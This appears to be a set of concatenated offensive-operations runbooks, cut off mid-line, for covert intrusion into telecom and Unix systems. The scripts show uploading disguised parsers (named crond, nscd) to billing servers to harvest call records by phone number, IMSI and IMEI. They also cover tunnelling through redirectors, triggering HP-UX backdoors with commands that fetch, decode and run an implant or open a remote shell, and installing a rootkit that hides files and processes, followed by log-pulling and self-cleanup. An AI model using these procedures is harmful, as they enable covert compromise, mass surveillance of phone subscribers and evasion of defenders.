### generates a list of Cell IDs associated with each MSC address: ### to limit amount of memory used, replace "-y" with "-Y numberBytes" -setenv B=-k CRYPTKEY -z "find /archive/cdrc/ -name '2006071[56]*.mob' -print" -y ./nscd >T:/current/down/cdrhits.orleansstride.HOST.DDMonYY.enc.surveyMSC ###### ##### when it's done running, decrypt the file (-d -c options) ###### cd /current/down ls -latr cdr*enc* # to decrypt individually: cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.orleansstride.HOST.DDMonYY.enc1 -o cdrhits.orleansstride.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.orleansstride.HOST.DDMonYY.enc2 -o cdrhits.orleansstride.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c # or decrypt all at one time (once all are written fully) cd /current/down for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done ls -latr cdr*txt* ###### ###### If you need to stop the parser before it completes: ### Control-C the nopen window containing the parser command ### ps -ef |grep nscd ### if the parser command is still "running", then kill the process: ### kill -9 ### You'll still be able to decrypt the partially completed data pull ###### ###### copy DECRYPTED data to media ###### ls -l cdr*txt* mz cp cdr*txt* /mnt/zip*/PROJECTNAME ls -l /mnt/zip*/PROJECTNAME uz ##### ##### clean up ##### -rm nscd awk -lt -cd /tmp -rm .scsi -lt w ps -ef | sort -lt / -burnBURN ### ### END File user.tool.orleansstride.COMMON ### (see also ../etc/user.tool.orleansstride.COMMON) ### ### BEGIN File user.tool.skimcountry.COMMON (see also ../etc/user.tool.skimcountry.COMMON) ### ################ SKIMCOUNTRY ######################### ############### PARSING ################################################################### ### vi Search/Replace commands ### ### ProjectName - self explanatory ### Date field - today's date, used for output files ### Host - hostname of the box (not IP address) ### Cryptkey - encryption key (use output from below md5sum command) md5sum /current/down/tcpdump.raw mx :%s/PROJECTNAME/PROJECTNAME/g :%s/DDMonYY/DDMonYY/g :%s/HOST/HOST/g :%s/CRYPTKEY/CRYPTKEY/g 'x ### Save the encryption key locally: echo CRYPTKEY > /current/down/cryptkey.skimcountry.DDMonYY ####### Prepare files containing numbers to search for: # if files containing the numbers to search available: mkdir /current/down/argfiles cd /current/down/argfiles mz cp /mnt/zip*/arg* /current/down/argfiles #or cp /mnt/zip*/PROJECTNAME/arg* /current/down/argfiles ls -altr ### Prep the argfiles: ### make sure the files are ASCII and contain NO EMPTY LINES!! ### make sure the last line does not contain a null character at the end ### (vi the file, add a carriage return to the last line, then delete the empty ### line and save) ### "file" results: ### This will not work: ASCII text, with CRLF line terminators ### This WILL: ASCII text cat arg* file arg* dos2unix arg* file arg* # if no data media is provided: # locally, create a file of numbers to grep for with each number on a separate line # make sure there are NO EMPTY LINES!!!! # Format of each type of argument: # p123456789 - phone number # s123456789 - IMSI # e123456789 - IMEI # c123/456 - Cell/LAC (no leading 0's) cd /current/down/argfiles vi /current/down/argfiles/argfile1.txt ########## To look at CDR directories try the following: ### Use the following commands to determine the location of current ### CDR data storage; Once you identify the location of the data, you'll ### use the head/tail commands to determine the date ranges being saved. ### These date ranges will be used as args in the skimcountry commands. ### Typical file locations per project: ########################## wrathhatch: # HOST 172.16.1.36 # active directories: -lt /var/archive/output_billing # this script should point to the backup directory location: -vget /var/archive/output_billing/MoveData.sh # backup directories: -lt /u01/oradata/output_billing/ -lt /u01/oradata/output_billing/0-9AugData/output_billing -lt /u01/oradata/output_billing/AugData/output_billing # get time ranges of active directories: ls -latr /var/archive/output_billing/isb/*ama | head -10 ls -latr /var/archive/output_billing/isb/*ama | tail -10 ls -latr /var/archive/output_billing/isb2/*ama | head -10 ls -latr /var/archive/output_billing/isb2/*ama | tail -10 ls -latr /var/archive/output_billing/isb/*ama | wc -l ls -latr /var/archive/output_billing/fsd1/*ama | head -10 ls -latr /var/archive/output_billing/fsd1/*ama | tail -10 ls -latr /var/archive/output_billing/fsd2/*ama | head -10 ls -latr /var/archive/output_billing/fsd2/*ama | tail -10 ls -latr /var/archive/output_billing/fsd3/*ama | head -10 ls -latr /var/archive/output_billing/fsd3/*ama | tail -10 ls -latr /var/archive/output_billing/fsd4/*ama | head -10 ls -latr /var/archive/output_billing/fsd4/*ama | tail -10 ### to pull a complete directory listing to the ops box: ls -latr /var/archive/output_billing/isb >L:/current/down/list_isb ########################## SKIMCOUNTRY ######################################################## ############################################################################################### ### Now, encrypt the ascii list locally... first make sure you have the encryption tool: cd /current/down/argfiles which cryptTool.v1.0.Linux2.4.18-14.targetdl ### If cryptTool not in PATH, change your PATH or insert full path in command ### to encrypt one at a time...skip to next comment to encrypt all at once: cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile1.txt -o argfile1.enc -k CRYPTKEY -b cryptTool.v1.0.Linux2.4.18-14.targetdl -i argfile2.txt -o argfile2.enc -k CRYPTKEY -b file argfile*.enc ### to encrypt all at the same time: for i in argfile* ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .txt`.enc -k CRYPTKEY -b ; done ls -l file argfile*.enc ### Tips for running the SKIMCOUNTRY 3.2 ### DO NOT _APPEND_ to the local file if using encryption - (no >>L: or >>T: )!!!! ### per each argfile, create .enc1, .enc1.more, .enc1.more2, etc if additional ### passes are needed for the date range ### DO NOT use -o if also using >L: or >T: (mixed output corrupts the decryption) ### The phone list is deleted automatically now ### Useful options: -k encryption key -o print filenames being parsed -P encrypted phone list -p plaintxt phone list -r DO NOT remove phone list after reading in -z unix list of files to parse -w do not encypt the output list (not recommended since file is created on target) ### Suggested -z options: ### this looks in subdirs, so use caution in backup dir (can be good AND bad): ### Also circumvents "parameter list too long" problem with wildcards with 'ls' -z "find /share/a1338/ne_q3ic/nb/convert/output -name '0506132*dF*' -print" ### works, but only for smaller ranges (command line arglist gets long) -z "ls -1rt /share/a1338/ne_q3ic/nb/convert/output/05110[3-6]*dF*" ##### NOTE: MUST CORRELATE NUMBERS IN ENCRYPTED TASKING FILENAMES (i.e. argfile1.enc) ##### TO OUTPUT FILENAMES (cdrhits*.enc1, cdrhits*.enc1.more, cdrhits*.enc1.more2, etc.) ##### NOTE2: GO FROM MOST RECENT TIME TO (PROBABLY CURRENT DATE) AS FAR BACK AS TIME ALLOWS ### benchmarking: # phonelist had 44 numbers # 3 day pull took 38 minutes over ALL directories # 1 day average pull took 10-13 minutes ### file name extensions: # GCDR = Nor # usd = Sie ######## Upload the parser (SKIMCOUNTRY) and called it crond # put up the parser tool mkdir /tmp/.scsi -cd /tmp/.scsi -put /current/up/skimcountry.v1.2.SunOS5.9.targetdl crond # or -put /mnt/zip*/skimcountry.v1.2.SunOS5.9.targetdl crond ##### Upload the encrypted phone list as adm, then run the parser: ############ argfile 1 -put /current/down/argfiles/argfile1.enc adm ./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082[2-4]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc1 -beep 15 ### Run again if needed for same tasking -put /current/down/argfiles/argfile1.enc adm ./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082[0-1]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc1.more -beep 15 ############ argfile 2 -put /current/down/argfiles/argfile2.enc adm ./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082[2-4]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc2 -beep 15 -put /current/down/argfiles/argfile2.enc adm ./crond -k CRYPTKEY -P adm -z "find /var/archive/output_billing -name 'MSC*06082[0-1]*ama' -print" >T:/current/down/cdrhits.skimcountry.HOST.DDMonYY.enc2.more -beep 15 ###### ###### to parse other vendor files: ###### #./crond -k CRYPTKEY -P adm -z "ls -1rt /var/archive/output_billing/*/MSC*20060629*usd*ama" > .mcftpl38755 ###### ##### when it's done running, decrypt the file (-d -c options) ###### cd /current/down ls -latr cdr*enc* # to decrypt individually: cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.skimcountry.HOST.DDMonYY.enc1 -o cdrhits.skimcountry.HOST.DDMonYY.txt1 -k CRYPTKEY -d -c cryptTool.v1.0.Linux2.4.18-14.targetdl -i cdrhits.skimcountry.HOST.DDMonYY.enc2 -o cdrhits.skimcountry.HOST.DDMonYY.txt2 -k CRYPTKEY -d -c # or decrypt all at one time (once all are written fully) cd /current/down for i in cdrhits*enc* ; do n="`echo $i | sed \"s,enc,txt,g\"`" ; cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o $n -k CRYPTKEY -d -c ; done ls -latr cdr*txt* ###### ###### If you need to stop the parser before it completes: ### Control-C the nopen window containing the parser command ### ps -ef |grep crond ### if the parser command is still "running", then kill the process: ### kill -9 ### You'll still be able to decrypt the partially completed data pull ###### #### target cleanup -rm adm crond -cd /tmp -rm .scsi -burnBURN ### You're done! ### ### END File user.tool.skimcountry.COMMON ### (see also ../etc/user.tool.skimcountry.COMMON) ### ### BEGIN File user.tool.dairyfarm.COMMON (see also ../etc/user.tool.dairyfarm.COMMON) ### ################################################################### ### DAIRYFARM ################################################################### DAIRYFARM procedures: mx :%s/TARGET_IP/TARGET_IP/g :%s/WINDOWS_REDIR_IP/WINDOWS_REDIR_IP/g :%s/LINUX_OP_BOX_IP/192.168.254.71/g :%s/WINDOWS_OP_BOX_IP/192.168.254.72/g :%s/CONTROL_PORT/CONTROL_PORT/g :%s/XSERVER_PORT/XSERVER_PORT/g :%s/NETCAT_PORT/NETCAT_PORT/g :%s/NOPEN_PORT/NOPEN_PORT/g :%s/RAT_NAME/sendmail/g :%s,TMP_DIR,/tmp/.scsi,g `x ### Follow steps in this order: ### 1) on linux box, start dairyfarm client: #./df_client 35535 127.0.0.1:40211 #./df_client CONTROL-PORT 127.0.0.1:XSERVER-PORT ./df_client CONTROL_PORT 127.0.0.1:XSERVER_PORT ### 2) on windows redir, set up tunnels: ### the next line replaces the normal tunnel to call back to the xserver port ### and references the df control port instead #background redirect -tcp -implantlisten 35535 -target 192.168.254.131 35535 -nodes 40 #background redirect -tcp -implantlisten CONTROL-PORT -target LINUX-OP-BOX CONTROL-PORT -nodes 40 background redirect -tcp -implantlisten CONTROL_PORT -target LINUX_OP_BOX_IP CONTROL_PORT -nodes 40 ### to udp 177 #background redirect -udp -lplisten 177 -target 61.555.227.115 177 -maxpacketsize 32000 #background redirect -udp -lplisten 177 -target TARGET-IP 177 -maxpacketsize 32000 background redirect -udp -lplisten 177 -target TARGET_IP 177 -maxpacketsize 32000 ### callback for netcat upload #background redirect -tcp -implantlisten 33881 -target 192.168.254.131 33881 -nodes 40 #background redirect -tcp -implantlisten NETCAT-PORT -target LINUX-OPS-BOX NETCAT-PORT -nodes 40 background redirect -tcp -implantlisten NETCAT_PORT -target LINUX_OP_BOX_IP NETCAT_PORT -nodes 40 ### callforward to nopen #background redirect -tcp -lplisten 32754 -target 61.555.227.115 32754 #background redirect -tcp -lplisten NOPEN-PORT -target UNIX-TARGET-IP NOPEN-PORT background redirect -tcp -lplisten NOPEN_PORT -target TARGET_IP NOPEN_PORT -bind WINDOWS_OP_BOX_IP ### 3) on windows redir, upload dairyfarm.exe as something obscure (help16.exe) and start: #background run -command "help16.exe 40211 127.0.0.1:35535" #background run -command "help16.exe XSERVER-PORT 127.0.0.1:CONTROL-PORT" background run -command "help16.exe XSERVER_PORT 127.0.0.1:CONTROL_PORT" ### 4) on linux, set up to launch YS, using appropriate wrap script: cd /current/up file noserver # cp appropriate noserver from morerats to /current/up # Need to noprep it? Different listener port (default is 32754) #noprep noserver -lNOPEN_PORT noprep noserver -lNOPEN_PORT #packrat -n /current/bin/nc.YS sendmail noserver.new 33881 #packrat -n /current/bin/nc.YS RAT_NAME noserver.new NETCAT-PORT packrat -n /current/bin/nc.YS RAT_NAME noserver.new NETCAT_PORT #./wrap-aix.sh -l 61.555.227.110 -r sendmail -p 33881 -x 40211 -d /tmp/.scsi #./wrap-hpux.sh -l 61.555.227.110 -r sendmail -p 33881 -x 40211 -d /tmp/.scsi #./wrap-sun.sh -l WIN-TARGET-IP -r RAT_NAME -p NETCAT-PORT -x XSERVER-PORT -d TMP_DIR ./wrap-sun.sh -l WINDOWS_REDIR_IP -r RAT_NAME -p NETCAT_PORT -x XSERVER_PORT -d TMP_DIR #./xc -x 61.555.227.110 -y 40211 -s 61.555.227.110 192.168.254.72 #./xc -x WIN-TARGET-IP -y XSERVER-PORT -s WIN-TARGET-IP WINDOWS-OP-BOX ./xc -x WINDOWS_REDIR_IP -y XSERVER_PORT -s WINDOWS_REDIR_IP WINDOWS_OP_BOX_IP ### 5) connect to nopen AFTER you control-c the netcat window: #noclient 192.168.254.72:32754 noclient WINDOWS_OP_BOX_IP:NOPEN_PORT ### 6) on linux, control-C the df_client window ### 7) on windows, the dairyfarm.exe (renamed as help16.exe or whatever) should ### go away from the process listing; You can now remove it from the target. ### ### END File user.tool.dairyfarm.COMMON ### (see also ../etc/user.tool.dairyfarm.COMMON) ### ### BEGIN File user.tool.trigger_hpux_jl_in.COMMON (see also ../etc/user.tool.trigger_hpux_jl_in.COMMON) ### ############################################################### # TRIGGERING HPUX INCISION via JACKLADDER and JACKLADDERHELPER ############################################################### ### BACKGROUND: ### HP-INCISION provides process and file hiding. It does NOT provide ### connection hiding nor does it have a triggering capability in this ### version (1.1.2.1 for HPUX11.00) ### HP-JACKLADDER differs from other JACKLADDERs because it requires the use ### of special source ports for triggering. The purpose of the special source ### ports is two-fold: it plays a part in the authentication process for the ### trigger, and it causes the 'accept' call to wait an extra 5 seconds for ### input, thus allowing it to work via most redirection (as long as the ### roundtrip time between the redirector and the target is less than 5 ### seconds.) ### JACKLADDERHELPER is an "instant-grat" version listening on an extra port. ### It only listens until the target reboots. ### On HPUX, it is typically installed on port 7162 running as 'memlogd'. ### JACKLADDER will take over once the target reboots. Depending on how it ### was installed, it will listen on ports started by inetd (check ### /etc/inetd.conf) or on the sendmail port. ### The HP-JACKLADDER and HP-JACKLADDERHELPER special source ports are: ### 3, 51, 8213, 12634, 16798, 23247 HP-TARGET-IP self-explanatory HP-JL-SOURCE-PORT 3, 51, 8213, 12634, 16798, or 23247 JL-LISTEN-PORT before target reboots - double-check but probably 7162; after target reboots - double-check, but probably try (13, 21, 23, 37, 113) NETCAT-PORT random for uploading nopen LINUX-OP-BOX local Linux machine (probably 192.168.254.71) WIN-OP-BOX local Windows machine (probably 192.168.254.72) UNIX-REDIR-IP IP that target will call back to WIN-REDIR-IP IP that target will call back to NOPEN_DIR directory to upload nopen to (/tmp/.scsi usually) (WILL NEED TO ESCAPE SLASHES) NOPEN_NAME name of nopen on target NOPEN_PORT port to run nopen on mx :%s/HP_TARGET_IP/HP_TARGET_IP/g :%s/HP_JL_SOURCE_PORT/HP_JL_SOURCE_PORT/g :%s/JL_LISTEN_PORT/JL_LISTEN_PORT/g :%s/NETCAT_PORT/NETCAT_PORT/g :%s/LINUX_OP_BOX/LINUX_OP_BOX/g :%s/WIN_OP_BOX/WIN_OP_BOX/g :%s/UNIX_REDIR_IP/UNIX_REDIR_IP/g :%s/WIN_REDIR_IP/WIN_REDIR_IP/g :%s/NOPEN_DIR/NOPEN_DIR/g :%s/NOPEN_NAME/NOPEN_NAME/g :%s/NOPEN_PORT/NOPEN_PORT/g 'x ######################################################### ### TO CONNECT TO JACKLADDER* thru solaris box: ######################################################### ### Verify the JACKLADDERHELPER port is still listening ### If the port doesn't respond, the target may have rebooted or JACKLADDER_HELPER died ### "Connection refused" means that the port isn't listening ### Otherwise scan for ports that should be started by inetd ### jackladderhelper port is probably 7162 -scan JL_LISTEN_PORT TARGET_IP ### On Solaris redirector: -jackpop HP_TARGET_IP JL_LISTEN_PORT UNIX_REDIR_IP HP_JL_SOURCE_PORT Your Choice[1] 1 UTC offset? [0] Which port will we be uploading nopen on? [44841] NETCAT_PORT Which port would you like nopen to listen on? [48970] NOPEN_PORT Nopen to upload[] CORRECT_NOSERVER_FROM_MORERATS Which directory would you like to create[/tmp/.dskman] NOPEN_DIR What would you like nopen called on target [podd] NOPEN_NAME Do you want incision to bless the nopen server? [Yn] Y Continue? [Yn] Y ### after the upload completes: ### close both jackpop windows, ### type DONE in -jackpop window ### connect using the -nstun command given by the -jackpop window ############ GO TO WEARCUP SECTION NOW IF SUCCESSFUL ######### ######## TROUBLESHOOTING ONLY - avoid syntax errors with commands being executed on target!: ### Test JL from redirector: ### special source ports: 3, 51, 8213, 12634, 16798, 23247 ### Probably need to redirect output (2>&0 1>&0 as below) for every ### command run -jackpop HP_TARGET_IP JL_LISTEN_PORT UNIX_REDIR_IP HP_JL_SOURCE_PORT 3 0 Y date 2>&0 1>&0 DONE ############################################################## ### TO CONNECT TO HP-UX JACKLADDER* thru non-Solaris Unix box: ############################################################## ### Window 1 on Unix redirector: -tunnel l JL_LISTEN_PORT HP_TARGET_IP JL_LISTEN_PORT HP_JL_SOURCE_PORT r NETCAT_PORT ### Window 2 on Unix redirector: # If nopen calling back: -nrtun NOPEN_PORT # If calling into nopen, don't run this until you run window 4 cmd # and nopen appears to be successfully uploaded -nstun HP_TARGET_IP:NOPEN_PORT ### Window 3 local packrat NOPEN_NAME CORRECT_NOSERVER_IN_MORERATS NETCAT_PORT ### Window 4 local and scripted # If calling forward into nopen: LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet UNIX_REDIR_IP NETCAT_PORT NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; uncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-lNOPEN_PORT; NOPEN_NAME" RA=UNIX_REDIR_IP RP=HP_JL_SOURCE_PORT HIDEME= nc 127.0.0.1 JL_LISTEN_PORT # If nopen is calling back: LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet UNIX_REDIR_IP NETCAT_PORT NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; uncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-cUNIX_REDIR_IP:NOPEN_PORT; export S=30; NOPEN_NAME" RA=UNIX_REDIR_IP RP=HP_JL_SOURCE_PORT HIDEME= nc 127.0.0.1 JL_LISTEN_PORT ### TROUBLESHOOTING: CMD can be changed to be any string of shell commands. ### If output from any command in the string desired, you may have to append ### the string "2>&0 1>&0" to each command ### i.e. "ls -la /tmp 2>&0 1>&0; uname -a 2>&0 1>&0" ### ### NOTE: you cannot remove or overwrite a running binary on HP-UX, so if ### you are trying to overwrite something during troubleshooting, this may ### be why ######################################################### ### TO CONNECT TO JACKLADDER* thru windows box: ######################################################### ### from windows target, scan JACKLADDERHELPER to see if it's still listening: banner -ip HP_TARGET_IP -port JL_LISTEN_PORT ### windows tunnels: ### ---------------- # Examples to connect, connect back to packrat window to upload nopen, and -nstun to target: ### connect to JACKLADDER* ### background redirect -tcp -lplisten JL-LISTEN-PORT -target HP-TARGET-IP JL-LISTEN-PORT HP-JL-SOURCE-PORT -bind WIN-OP-BOX ### background redirect -tcp -lplisten 7162 -target 10.27.50.41 7162 12634 -bind 192.168.254.72 background redirect -tcp -lplisten JL_LISTEN_PORT -target HP_TARGET_IP JL_LISTEN_PORT HP_JL_SOURCE_PORT -bind WIN_OP_BOX ### callback to PACKRAT window ### background redirect -tcp -implantlisten NETCAT-PORT -target LINUX-OP-BOX NETCAT-PORT ### background redirect -tcp -implantlisten 39778 -target 192.168.254.71 39778 background redirect -tcp -implantlisten NETCAT_PORT -target LINUX_OP_BOX NETCAT_PORT ### call forward to NOPEN PORT (default listen port = 32754) ### background redirect -tcp -lplisten 32754 -target HP-TARGET-IP 32754 -bind WIN-OP-BOX ### background redirect -tcp -lplisten 32754 -target 10.27.50.41 32754 -bind 192.168.254.72 background redirect -tcp -lplisten NOPEN_PORT -target HP_TARGET_IP NOPEN_PORT -bind WIN_OP_BOX ### additional nopen windows (increment the lplisten port only): ### background redirect -tcp -lplisten 32755 -target HP-TARGET-IP 32754 -bind WIN-OP-BOX ### background redirect -tcp -lplisten 32755 -target 10.27.50.41 32754 -bind 192.168.254.72 background redirect -tcp -lplisten ANOTHER_PORT -target HP_TARGET_IP NOPEN_PORT -bind WIN_OP_BOX background redirect -tcp -lplisten ANOTHER_ANOTHER_PORT -target HP_TARGET_IP NOPEN_PORT -bind WIN_OP_BOX ### local linux: ### ----------- # RA = redirector address # RP = redirector source port # In local window packrat NOPEN_NAME CORRECT_NOSERVER_IN_MORERATS NETCAT_PORT ### in a local scripted window: LD_PRELOAD=/current/bin/connect.so CMD="mkdir NOPEN_DIR; cd NOPEN_DIR; telnet WIN_REDIR_IP NETCAT_PORT NOPEN_NAME.uu; uudecode NOPEN_NAME.uu ; uncompress -f NOPEN_NAME.Z; chmod 700 NOPEN_NAME; export PATH=.; export D=-lNOPEN_PORT; nscd" RA=WIN_REDIR_IP RP=HP_JL_SOURCE_PORT HIDEME= nc WIN_OP_BOX JL_LISTEN_PORT ### once the target uploads nopen, the LD_PRELOAD window should give you a prompt back; ### you can then connect to nopen: noclient WIN_OP_BOX:NOPEN_PORT noclient WIN_OP_BOX:ANOTHER_PORT noclient WIN_OP_BOX:ANOTHER_ANOTHER_PORT ######## TROUBLESHOOTING ONLY - avoid syntax errors with commands being executed on target!: ### to run a command on target (do not string together multiple commands): ### LD_PRELOAD=./connect.so.RHEL4 CMD="uname -a" RA=WIN-REDIR-IP RP=HP-JL-SOURCE-PORT telnet WIN-OP-BOX JL-LISTEN-PORT ### LD_PRELOAD=./connect.so.RHEL4 CMD="uname -a" RA=10.27.50.50 RP=HP-JL-SOURCE-PORT telnet 192.168.254.72 7162 LD_PRELOAD=/current/bin/connect.so CMD="uname -a" RA=WIN_REDIR_IP RP=HP_JL_SOURCE_PORT nc WIN_OP_BOX JL_LISTEN_PORT ### to create a file on target: ### LD_PRELOAD=./connect.so.RHEL4 CMD="touch /tmp/.scsi/x " RA=WIN-REDIR-IP RP=HP-JL-SOURCE-PORT telnet WIN-OP-BOX JL-LISTEN-PORT ### LD_PRELOAD=./connect.so.RHEL4 CMD="touch /tmp/.scsi/x" RA=10.27.50.50 RP=HP-JL-SOURCE-PORT telnet 192.168.254.72 7162 LD_PRELOAD=/current/bin/connect.so CMD="touch /tmp/.scsi/x" RA=WIN_REDIR_IP RP=HP_JL_SOURCE_PORT nc WIN_OP_BOX JL_LISTEN_PORT ### to get an interactive window: ### LD_PRELOAD=./connect.so.RHEL4 CMD="/bin/sh 2>&0 1>&0" RA=WIN-REDIR-IP RP=HP-JL-SOURCE-PORT nc WIN-OP-BOX JL-LISTEN-PORT ### LD_PRELOAD=./connect.so.RHEL4 CMD="/bin/sh 2>&0 1>&0" RA=10.27.50.50 RP=HP-JL-SOURCE-PORT nc 192.168.254.72 7162 LD_PRELOAD=./connect.so.RHEL4 CMD="/bin/sh 2>&0 1>&0" RA=WIN_REDIR_IP RP=HP_JL_SOURCE_PORT nc WIN_OP_BOX JL_LISTEN_PORT ######################################################### # Running WEARCUP and NOT using -burn ######################################################### ### Once connected, you will be in your temporary directory and will need ### to clean it up. However, HPUX systems will not allow you to delete an ### executable if it's running, nor the directory it's running in. To ### circumvent this, use 'cup' (CleanUp) -lt -rm nscd.uu -gs wearcup -h # change the options for what you want to call cup and how long you want cup # to sleep before it kills nopen and cleans your working directory, # then run it -gs wearcup -r snmpd -w 4h # when it is time to end the op, kill the "sleep" pid to start immediate cleanup # to extend the op, kill the pid of the script (now called snmpd) then kill the sleep # DO NOT -burnBURN !!!!!! # use -exit for your windows!!!!! ######################################################### ### HP-INCISION technique checks ######################################################### ### Check if JACKLADDERHELPER is still running: ps -ef |grep memlogd ### Verify the hidden directory is visible from your hidden process: -lt /lost+found/3d9892354a360245add0f483f269f384 ### Verify the hidden directory is no longer visible when you're in /dev: cd /dev; ls -la /lost+found/3d9892354a360245add0f483f269f384 ### system kernel checks: ### get system configuration value for CPU_VERSION; should return 532 /usr/bin/getconf SC_CPU_VERSION ### get system configuration value for KERNEL_BITS; should return 64 /usr/bin/getconf SC_KERNEL_BITS ### get the status of any kernel modules that are currently loaded ### if under INCISION, should see krm and krm64 kmadmin -s ### check reboot history last -15 reboot ### check and pull logs -lt /var/adm/syslog/syslog* -get /var/adm/syslog/syslog* -lt /etc/rc.log* -get /etc/rc.log* -lt /var/adm/crash -lt /*history -lt /root/*history -vget /*history /root/*history ######################################################### ### ### END File user.tool.trigger_hpux_jl_in.COMMON ### (see also ../etc/user.tool.trigger_hpux_jl_in.COMMON) ### ### BEGIN File user.tool.stoicsurgeon.COMMON (see also ../etc/user.tool.stoicsurgeon.COMMON) ### ##### Stoicsurgeon Ctrl Usage, Installation and Troubleshooting Script ##### ### WARNING! READ THIS! WARNING! READ THIS! WARNING! READ THIS! WARNING! ### # # NEVER explicitly reference any cloaked file or directory from an unprivileged # process. Wildcards are ok, but explicit references are not. Stoic will # self-destruct if an explicit reference to a cloaked file ever occurs from an # unprivileged process. This includes the cloaked directory, any files inside # the cloaked directory, any files/directories hidden after installation using # Ctrl, the /proc entry of cloaked processes, etc. # # Examples: # Assume /lib/.0123456789abcdef is a cloaked file or directory # -lt /lib/.0123456789abcdef ##### BAD BAD BAD BAD BAD ##### # -lt /lib/.012* ##### GOOD, WILL NOT SEE OUTPUT FOR CLOAKED DIR, # ##### WILL NOT SELF-DESTRUCT # # Assume 12345 is a cloaked process # -lt /proc/12345/exe ##### BAD BAD BAD BAD BAD ##### # -lt /proc/*/exe ##### GOOD, WILL NOT SEE OUTPUT FOR 12345 # ##### WILL NOT SELF-DESTRUCT # # The cloaked directory will be in one of the following directories: # (the first one of these directories that exists and is on the same disk # partition as the root of the filesystem "/", see output from "df" or # "mount" commands) # -lt /var/tmp # -lt /lib # -lt /dev # -lt /etc # -lt / # # Refer to what the `pwd` from triggering Dewdrop returned if possible # ### END WARNING END WARNING END WARNING END WARNING END WARNING END WARNING ### ########## Global Search/Replace commands ########## ## Target IP: IP address of newly deployed STOIC ## Target hostname: output from running "uname -n" on target ## Callback port: port for DD to call back to connect to ish (usually random) ## Redirector IP: IP for DD to call back to connect to ish ### Target hostname MUST be output from "uname -n" on TARGET!!!!!!!!!! ### uname -n mx :%s/TARGET_IP/TARGET_IP/g :%s/TARGET_HOSTNAME/TARGET_HOSTNAME/g :%s/CALLBACK_PORT/CALLBACK_PORT/g :%s/REDIRECTOR_IP/REDIRECTOR_IP/g 'x ############################################################################ ##### INSTALLATION ##### ############################################################################ ## First, make sure no other implants are installed, i.e. the family # If Solaris -strings /platform ## For Solaris, confirm can install against this kernel level # Version number format: MAJORVERSION_MINORVERSION # Valid patchlevels under "Kernel version": major version < 118833 # if = 118833, minor version <= 24 # Solaris 7 Sparc: major version < 106541 # major version == 106541, minor version <= 44 # Solaris 8 Sparc: major version < 117350 # major version == 117350, minor version <= 47 # Solaris 8 x86: major version < 108529 # major version == 108529, minor version <= 27 # Solaris 9 Sparc: major version < 122300 # major version == 122300, minor version <= 11 # Solaris 9 x86: major version < 118559 # major version == 118559, minor version <= 39 # Solaris 10 Sparc: major version < 125100 # major version == 125100, minor version <= 07 # showrev -a # If higher than these, DO NOT INSTALL and report this -problem untested solaris patch level MAJORVERSION_MINORVERSION ## If installing on Linux, compare /proc/version with version being deployed ## Also compare hashes of installed kernels for another sanity check -cat /proc/version md5sum /boot/vmlinuz* ## upload STOICSURGEON Installation Package -put /current/up/date date ## run STOICSURGEON Installation Package PATH=. date ## Take note of the Date that is displayed, "00" in the seconds field means SUCCESS ## If the Seconds field does not show "00" take note of the entire date provided and ## save data via notes or "-problem". A listing of possible values is located at the ## end of this script in the APPENDIX section. -problem stoicsurgeon failed install, the date string was OUTPUT_FROM_DATE ## :30 error? On solaris 10, you get this if the kmdb module is loaded. ## Temporary workaround (as of 30 OCT 2007) is to remove it. modinfo | grep kmdb ## Remove kmdb (NOT kmdbmod), the NUM here is the first column ## modunload -i NUM modinfo | grep kmdb ## Then try again -put /current/up/date date PATH=. date ################################################### ### Trigger Dewdrop and verify SS is working ###### ################################################### ### Below are commands to trigger DD without upload/execute, there ### will be no Nopen session, will have a prompt in the "ish" shell ### Possibility exists will have to play with options to ourtn/-irtun ### to trigger on certain ports, etc. ### Try THIS first (if redirecting from Nopen) -irtun TARGET_IP CALLBACK_PORT -Y5 ### or (if going direct) ourtn -Y5 -p CALLBACK_PORT TARGET_IP ### for Dewdrop-3.X tipoff-3.X --trigger-address TARGET_IP --target-address TARGET_IP --target-protocol --target-port TARGET_PORT --callback-address CALLBACK_IP --callback-port CALLBACK_PORT --start-ish ### look for output from "pwd" run after target calls back, the resulting ### directory is the SS hidden directory ## In Dewdrop window get the pid of DD connection to ish shell echo $$ ## set DD PID in the rest of the script mx :%s/DEWDROP_PID/DEWDROP_PID/g `x ## In un-elevated Nopen window, verify Dewdrop connection and processes are cloaked ps -ef | grep DEWDROP_PID netstat -an | grep CALLBACK_PORT ## the hidden directory will be somewhere on the root filesystem, ## you can now do a directory listing of the hidden directory's parent ## in the un-elevated Nopen window to determine that it is indeed hidden ## (i.e. do "-ls /var/tmp" if hidden dir is "/var/tmp/.0123456789abcdef") ## ## REMINDER: DO NOT EXPLICITLY NAME HIDDEN FILES/DIRS FROM AN UNPRIVILEGED ## WINDOW (see top of script for more detailed explanation) -ls /var/tmp -ls /lib -ls /dev -ls /etc -ls / ## Report any cloaking failures via notes or "-problem" ####################################################################### ##### IF NO PROBLEMS ENCOUNTERED, INSTALLATION COMPLETE ##### ####################################################################### ####################################################################### ##### Ctrl Usage and Troubleshooting Instructions ##### ####################################################################### ### Should have at least two Nopen 